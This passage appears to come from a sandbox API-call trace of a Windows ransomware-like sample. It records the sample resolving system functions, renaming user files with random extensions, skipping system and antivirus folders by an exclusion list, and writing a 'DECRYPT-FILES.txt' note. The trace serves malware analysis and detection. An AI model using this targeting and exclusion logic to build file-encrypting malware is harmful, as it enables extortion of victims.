lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.998] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.998] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.998] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.998] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.998] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.999] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.999] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.999] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.999] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.999] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.999] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.999] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.999] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.999] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.999] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.999] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.999] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.999] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.999] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.999] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.999] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.999] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.999] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.999] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0186.000] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0186.000] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0186.000] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0186.000] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0186.000] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0186.000] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0186.000] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0186.000] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0186.000] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0186.000] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0186.000] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0186.000] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0186.000] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0186.000] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0186.000] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0186.001] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp") returned 48 [0186.001] wsprintfW (in: param_1=0x36fe754, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp.AyyiKH") returned 55 [0186.001] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.eh5o5jp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp.AyyiKH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.eh5o5jp.ayyikh"), dwFlags=0x0) returned 1 [0186.001] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.001] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.002] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.002] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0108020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0108020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0186.002] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0186.002] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0186.002] lstrcatW (in: lpString1="Pictures", lpString2="\\" | out: lpString1="Pictures\\") returned="Pictures\\" [0186.002] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.002] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.002] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\0a16c9.tmp") returned 50 [0186.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.003] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.003] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\DECRYPT-FILES.txt") returned 57 [0186.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.003] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0186.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf191f880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf191f880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.003] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf191f880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf191f880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.003] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12217e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf191f880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf191f880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.003] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.004] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.004] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.004] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.004] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.004] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.004] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.004] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.004] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.004] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0a16c9.tmp" [0186.004] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.004] CloseHandle (hObject=0x0) returned 0 [0186.004] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.004] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4d1d20, ftCreationTime.dwHighDateTime=0x1d4cc70, ftLastAccessTime.dwLowDateTime=0x53fa72b0, ftLastAccessTime.dwHighDateTime=0x1d4ca25, ftLastWriteTime.dwLowDateTime=0xaf782820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7zLH.gif.ZKSng3g", cAlternateFileName="7ZLHGI~1.ZKS")) returned 1 [0186.004] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="DECRYPT-FILES.txt") returned -1 [0186.004] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="autorun.inf") returned -1 [0186.004] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="boot.ini") returned -1 [0186.004] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="desktop.ini") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="ntuser.dat") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="iconcache.db") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="bootsect.bak") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="ntuser.dat.log") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="thumbs.db") returned -1 [0186.005] lstrcmpiW (lpString1="7zLH.gif.ZKSng3g", lpString2="Bootfont.bin") returned -1 [0186.005] lstrlenW (lpString="7zLH.gif.ZKSng3g") returned 16 [0186.005] lstrcmpiW (lpString1="ZKSng3g", lpString2="lnk") returned 1 [0186.005] lstrcmpiW (lpString1="ZKSng3g", lpString2="exe") returned 1 [0186.005] lstrcmpiW (lpString1="ZKSng3g", lpString2="sys") returned 1 [0186.005] lstrcmpiW (lpString1="ZKSng3g", lpString2="dll") returned 1 [0186.005] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.005] lstrlenW (lpString="7zLH.gif.ZKSng3g") returned 16 [0186.005] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="7zLH.gif.ZKSng3g" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif.ZKSng3g") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif.ZKSng3g" [0186.005] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif.ZKSng3g" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7zlh.gif.zksng3g"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.005] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=66913) returned 1 [0186.006] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.006] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.006] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.006] CloseHandle (hObject=0x260) returned 1 [0186.006] CloseHandle (hObject=0x25c) returned 1 [0186.006] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.007] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440f3790, ftCreationTime.dwHighDateTime=0x1d4cc8d, ftLastAccessTime.dwLowDateTime=0xcbfe6b30, ftLastAccessTime.dwHighDateTime=0x1d4c6ac, ftLastWriteTime.dwLowDateTime=0xaf7ceae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x103c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BeweMui.bmp.CInY", cAlternateFileName="BEWEMU~1.CIN")) returned 1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="DECRYPT-FILES.txt") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="autorun.inf") returned 1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="boot.ini") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="desktop.ini") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="ntuser.dat") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="iconcache.db") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="bootsect.bak") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="ntuser.dat.log") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="thumbs.db") returned -1 [0186.007] lstrcmpiW (lpString1="BeweMui.bmp.CInY", lpString2="Bootfont.bin") returned -1 [0186.007] lstrlenW (lpString="BeweMui.bmp.CInY") returned 16 [0186.007] lstrcmpiW (lpString1="CInY", lpString2="lnk") returned -1 [0186.007] lstrcmpiW (lpString1="CInY", lpString2="exe") returned -1 [0186.007] lstrcmpiW (lpString1="CInY", lpString2="sys") returned -1 [0186.007] lstrcmpiW (lpString1="CInY", lpString2="dll") returned -1 [0186.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.007] lstrlenW (lpString="BeweMui.bmp.CInY") returned 16 [0186.007] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.007] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="BeweMui.bmp.CInY" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp.CInY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp.CInY" [0186.007] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp.CInY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bewemui.bmp.ciny"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.008] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=66496) returned 1 [0186.008] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.008] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.009] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.009] CloseHandle (hObject=0x260) returned 1 [0186.009] CloseHandle (hObject=0x25c) returned 1 [0186.009] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.009] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.009] lstrcmpiW (lpString1="DECRYPT-FILES.txt", 